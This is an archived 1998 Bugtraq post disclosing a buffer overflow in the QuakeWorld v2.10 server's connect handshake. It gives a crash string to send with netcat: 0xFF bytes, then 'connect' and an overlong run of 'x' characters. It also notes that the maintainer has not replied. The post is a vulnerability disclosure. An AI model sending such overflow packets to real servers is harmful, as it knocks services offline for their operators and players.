Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1998_2

Bugtraq archives for 2nd quarter (Apr-Jun) 1998: QW vulnerability

QW vulnerability

Glenn F. Maynard (glennmMEDIAONE.NET)
Tue, 7 Apr 1998 19:42:09 -0400

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Chris Wedgwood: "AppleShare IP Mail Server"
Previous message: Mark Schaefer: "BSDI inetd crash"

On the same note, QuakeWorld v2.10 (latest) is overflowable in the
initial "connect" sequence.

The first client->server packet gives the user name, colors, etc:

0xFF,0xFF,0xFF,0xFF followed by (plaintext) ->
connect "\name\Glenn\key\data"

There is no bounds checking on this connect; netcatting the following
will crash the server (although segfault appears trapped; no message is
displayed, and no core is left): '    connect "\x\xxxxxxxxxxxxxxxxxx'
(repeat "x" as needed; replace the first 4 spaces with 0xFF).

I've done no actual testing on the buffer length, and my assembler skills
are not enough to give an example exploit.

FTR, I've mailed Zoid (current maintainer of QW) multiple times about this
(and told him once on IRC); not once have I received a reply.

 - Glenn F. Maynard

Next message: Chris Wedgwood: "AppleShare IP Mail Server"
Previous message: Mark Schaefer: "BSDI inetd crash"